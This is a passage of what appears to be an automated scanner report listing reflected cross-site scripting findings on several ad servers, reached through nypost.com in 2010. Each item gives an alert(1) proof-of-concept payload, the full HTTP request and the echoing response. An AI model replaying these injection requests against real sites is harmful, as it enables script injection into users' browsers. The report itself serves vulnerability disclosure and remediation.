ubleclick.net/click%3Bh%3Dv8/3a5e/f/391/%2a/f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|28bbda"-alert(1)-"a1a576feacd&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26va
...[SNIP]...

1.29. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd1a3'-alert(1)-'c324d152421 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2bd1a3'-alert(1)-'c324d152421&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7201
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:46:59 GMT
Expires: Fri, 26 Nov 2010 20:46:59 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
ubleclick.net/click%3Bh%3Dv8/3a5e/f/391/%2a/f%3B231400901%3B0-0%3B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2bd1a3'-alert(1)-'c324d152421&pnid=0&eventid=10001&merchantid=3250009920&templateid=1278264146&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26va
...[SNIP]...

1.30. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [templateid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the templateid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b7bb"-alert(1)-"de86702b0d5 was submitted in the templateid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=12782641469b7bb"-alert(1)-"de86702b0d5&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7201
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:08 GMT
Expires: Fri, 26 Nov 2010 20:47:08 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=12782641469b7bb"-alert(1)-"de86702b0d5&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%
...[SNIP]...

1.31. http://ad.vulnerable.ad.partner/adi/N5214.272677.VERUTA/B4835013.2 [templateid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5214.272677.VERUTA/B4835013.2

Issue detail

The value of the templateid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16802'-alert(1)-'dda5ef572d6 was submitted in the templateid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5214.272677.VERUTA/B4835013.2;sz=728x90;click=http://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=127826414616802'-alert(1)-'dda5ef572d6&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0%2E38223100%5F1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww%2Eadbrite%2Ecom%252Fmb%252Fcommerce%252Fpurchase%5Fform%2Ephp%253Fother%5Fproduct%5Fid%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww%2Enypost%2Ecom&rurl=;ord=[timestamp]? HTTP/1.1
Host: ad.vulnerable.ad.partner
Proxy-Connection: keep-alive
Referer: http://adserver.veruta.com/display.fcgi?templatesize=728_90&pnid=0&clickTAGPrefix=http%3A%2F%2Fclick.adbrite.com%2Fmb%2Fclick.php%3Fsid%3D1007974%26banner_id%3D12760734%26variation_id%3D1540945%26uts%3D1290802665%26keyword_id%3D%26ab%3D168296609%26sscup%3D3c3e694fe60d96518a04f1e3a38b1f35%26sscra%3Ddeced0c49c001174f3ac0ecce5c78bd5%26ub%3D2927237082%26guid%3D168300585x0.38223100_1286764964x652324932%26odc%3Dsvx%26rs%3Dtp%26tgt%3Dhttp%253A%252F%252Fwww.adbrite.com%252Fmb%252Fcommerce%252Fpurchase_form.php%253Fother_product_id%253D1007974%26sc%3D%26adt%3D1%26bg%3D11954150%26rhash%3D81f180401b2ccfaa6ae91c6ccb860338%2Ce7becb8fd85ff7488f5ad945efc1eff1%26advid%3D0%26nsscup%3Db9be49f696f1adb0a450c4208c06eb56%26bkw%3D%26r%3D&refurl=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm%26refer%3D
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7201
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:47:09 GMT
Expires: Fri, 26 Nov 2010 20:47:09 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,978 Template Name = #Flash - Retargeting
...[SNIP]...
B0%3B55549399%3B3454-728/90%3B38954104/38971861/1%3B%3B%7Esscs%3D%3fhttp://adserver.veruta.com/track.fcgi?ueid=3690285109|1289324293|1|2&pnid=0&eventid=10001&merchantid=3250009920&templateid=127826414616802'-alert(1)-'dda5ef572d6&adimpid=kYC5LlbRj4Va&clickTAGPrefix=http%3A%2F%2Fclick%2Eadbrite%2Ecom%2Fmb%2Fclick%2Ephp%3Fsid%3D1007974%26banner%5Fid%3D12760734%26variation%5Fid%3D1540945%26uts%3D1290802665%26keyword%5Fid%3D%26ab%
...[SNIP]...

1.32. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 71b29<script>alert(1)</script>ab0b90d15be was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1506171&pid=87177571b29<script>alert(1)</script>ab0b90d15be&ps=-1&zw=470&zh=150&url=http%3A//www.nypost.com/&v=5&dct=New%20York%20News%20%7C%20Gossip%20%7C%20Sports%20%7C%20Entertainment%20%7C%20Photos%20-%20New%20York%20Post HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16degdj1db1obm; TData=99999%7C52615%7C53575%7C54075%7C54209%7C54243%7C60489%7C60515%7C60740%7C60183%7C50212%7C50220

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:47:57 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2509


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "87177571b29<script>alert(1)</script>ab0b90d15be"

   
                                                           </head>
...[SNIP]...

1.33. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 36330--><script>alert(1)</script>193e77e2319 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=150617136330--><script>alert(1)</script>193e77e2319&pid=871775&ps=-1&zw=470&zh=150&url=http%3A//www.nypost.com/&v=5&dct=New%20York%20News%20%7C%20Gossip%20%7C%20Sports%20%7C%20Entertainment%20%7C%20Photos%20-%20New%20York%20Post HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16degdj1db1obm; TData=99999%7C52615%7C53575%7C54075%7C54209%7C54243%7C60489%7C60515%7C60740%7C60183%7C50212%7C50220

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:47:55 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3249


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "150617136330--><script>alert(1)</script>193e77e2319" -->
...[SNIP]...

1.34. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 854f2--><script>alert(1)</script>8b7777092ef was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1506171&pid=871775&ps=-1854f2--><script>alert(1)</script>8b7777092ef&zw=470&zh=150&url=http%3A//www.nypost.com/&v=5&dct=New%20York%20News%20%7C%20Gossip%20%7C%20Sports%20%7C%20Entertainment%20%7C%20Photos%20-%20New%20York%20Post HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16degdj1db1obm; TData=99999%7C52615%7C53575%7C54075%7C54209%7C54243%7C60489%7C60515%7C60740%7C60183%7C50212%7C50220

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:48:01 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3688


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-1854f2--><script>alert(1)</script>8b7777092ef" -->
   
...[SNIP]...

1.35. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68684"-alert(1)-"a9e869a53db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1591356&admeld_user_id=5a738589-032a-45ab-a7ad-eba47ded6846&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&68684"-alert(1)-"a9e869a53db=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290805804732&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fbackissues%2Fbackissues.htm&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:48:28 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Fri, 26 Nov 2010 20:48:28 GMT
Pragma: no-cache
Content-Length: 5050
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?68684"-alert(1)-"a9e869a53db=1&Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=5a738589%2d032a%2d45ab%2da7ad%2deba47ded6846&s=1591356&_salt=1154617033";var RM_POP_COOKIE_NAME='ym
...[SNIP]...

1.36. http://adserver.adtechus.com/addyn/3.0/5132/860615/0/170/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5132/860615/0/170/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b81e"-alert(1)-"c90a8ec1575 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5132/860615/0/170/ADTECH;loc=100;target=_blank;sub1=javascript;sub2=noauto;misc=4034247;misc=1290805804740;rdclick=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/f%3B229319090%3B0-0%3B0%3B44600216%3B4307-300/250%3B34845515/34863370/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f6b81e"-alert(1)-"c90a8ec1575 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/backissues/backissues.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1065

var projectid = 2263;
var playerwidth = 300;
var playerheight = 250;
//var clickurl = "ADCLICKESC";
var identifier = "TremorMedia";
document.write("\n");
document.write("<scr"+"ipt src=\"http://conten
...[SNIP]...
.net/click%3Bh%3Dv8/3a5e/3/0/%2a/f%3B229319090%3B0-0%3B0%3B44600216%3B4307-300/250%3B34845515/34863370/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f6b81e"-alert(1)-"c90a8ec1575http://dimestore.com/defaultclick\">
...[SNIP]...

1.37. http://adserver.adtechus.com/addyn/3.0/5132/860615/0/170/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5132/860615/0/170/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feec2"-alert(1)-"eb1713b52d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5132/860615/0/170/ADTECH;loc=100;target=_blank;sub1=javascript;sub2=noauto;misc=4034247;misc=1290805804740;rdclick=http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/f%3B229319090%3B0-0%3B0%3B44600216%3B4307-300/250%3B34845515/34863370/1%3B%3B~fdr%3D231953222%3B0-0%3B0%3B37896040%3B4307-300/250%3B34862146/34880001/1%3B%3B~sscs%3D%3f&feec2"-alert(1)-"eb1713b52d2=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/backissues/backissues.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1068

var projectid = 2263;
var playerwidth = 300;
var playerheight = 250;
//var clickurl = "ADCLICKESC";
var identifier = "TremorMedia";
document.write("\n");
document.write("<scr"+"ipt src=\"http://conten
...[SNIP]...
